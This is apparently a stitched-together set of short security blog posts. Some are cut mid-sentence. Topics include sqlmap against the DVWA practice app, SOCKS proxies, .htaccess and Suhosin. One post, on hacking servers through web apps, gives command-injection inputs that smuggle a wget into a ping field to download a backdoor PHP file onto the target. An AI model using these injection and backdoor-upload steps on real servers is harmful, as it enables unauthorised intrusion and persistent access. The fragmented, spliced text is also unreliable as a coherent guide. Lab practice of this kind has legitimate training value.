Installing Backdoor in the Database through SQL Injection

Now, I will to explain about how to installing backdoor in the database through SQL Injection. For this practice, I try to use DVWA as web application. DVWA is already available web application about SQL Injection and SQL Injection (Blind).

First, I choose SQL Injection as my target. In the user id form, I just type admin and then click submit, but does not happen. Then, I try to copy address (from the site after I submit the admin as user id). I use sqlmap and try this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"

but, this is failed to get database. Then, I try to use tamper data from browser. From tamper data, I get cookie and copy it. With sqlmap, I try to scan again with this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101

/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"

the result from the command above, I can see the parameter id is vulnerable and might me injectable.

SOCKS, SOCKS v4, SOCKS v5 and HTTP

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded.

One use of SOCKS is to allow connections to be made through a firewall.

SOCKS4 is the first widely adopted version of the protocol.  It suffers from a couple of problems which have been remedied in SOCKS4A and SOCKS5, namely :

·       It requires clients to know the IP address (e.g. 123.123.123.123) of the servers they want to connect to.  This means, in most cases, that they must be able to resolve domain names.

·        There is no authentication.  A client only requires a user-name to be able to access SOCKS4 services.

SOCKS4A is a simple extension to SOCKS4 which solves the former problem, but not the latter.

SOCKS5 is the most recent version of the SOCKS protocol.  It solves both the problems of

Hacking System Through Web Application

Some people who create web usually not notice the secure from their web. It is dangerous and harmless. Through web application, we can attack the server.

In this post, I will to tell about my experience how to hacking server through web application.

First step, we must search the vulnerability from the web application. In this web, I found the command execution from the site.

Then, I try to ping the IP address (in this case, I already have IP address from the server).

After I write the IP address, the result appears below. It mean I can do something from this command execution.

Next, I try to upload image through command execution but nothing response or not happen anything. Then, I try to upload backdoor and the response is same with when I upload image.

To upload file through command execution we can use this command :

ip_target | wget our_ip_address/file.jpg -O 123.jpg (in this command we must start our apache and file must saved to /var/www/)

or we can use this command :

;wget (layout file)/file.php -O 123.php

.htaccess

Hypertext Access, commonly shortened to htaccess, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It’s an incredibly useful feature which allows webmasters to control how many aspects of their website works. You can redirect pages, change the extensions of pages, password protect directories and much much more.

In this htaccess guide I will show you some of the basic tricks and tips which will help you with your website.

So what is htaccess?

The htaccess file is a configuration file which is used on Apache based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your hosts file manager or alternatively you can download the file, edit it and reupload it.

If you have installed a script before then chances are you have had to edit the

.htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how you edit the file.

Suhosin

Suhosin is part of the Hardened PHP project, the project to make PHP more secure. Suhosin PHP extension that will be checking various things such as suspicious input (to detect SQL injection for example), prevent the occurrence of a bug in the Zend engine, making the default PHP settings to be more secure (eg turning off the remote features include by default), etc.. For more details about the features and usage can be read on the homepage Suhosin Suhosin.

For the sake of better security, on the hosting server, equipped with Suhosin PHP installation began in January 2007.

Equipped Suhosin PHP is not a "silver bullet" or a comprehensive solution that is perfect. The most important factor remains keeping the security is in your hands as a programmer / developer to keep doing the programming is secure and install an application / library PHP is up to date.